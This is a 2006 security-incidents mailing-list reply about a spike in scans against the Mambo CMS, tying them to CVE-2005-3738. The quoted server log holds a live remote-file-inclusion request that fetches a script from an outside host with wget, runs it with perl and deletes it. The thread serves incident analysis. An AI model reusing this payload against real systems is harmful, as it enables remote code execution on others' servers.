Re: High volume of Mambo scans
"George A. Theall" <[email protected]> Sun, 14 May 2006 20:24:58 -0400
| Newsgroups | gmane.comp.security.incidents |
|---|---|
| Message-ID | <[email protected]> |
On Sat, May 13, 2006 at 10:36:41AM -0300, Daniel Cid wrote: > Since Thursday night I'm seeing a high volume of scans ... > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" This looks like what's covered by CVE-2005-3738 and described here: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html George -- [email protected]
signature.asc
(application/pgp-signature, 191 B)
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEZ8paIlpM0zvbu3wRAt+EAJ4lnxkqUAqO+QGEskhpIuRoJqXTDACg5U9o XrVmnmpPWY2uE8TIxfqBWJs= =KWYM -----END PGP SIGNATURE-----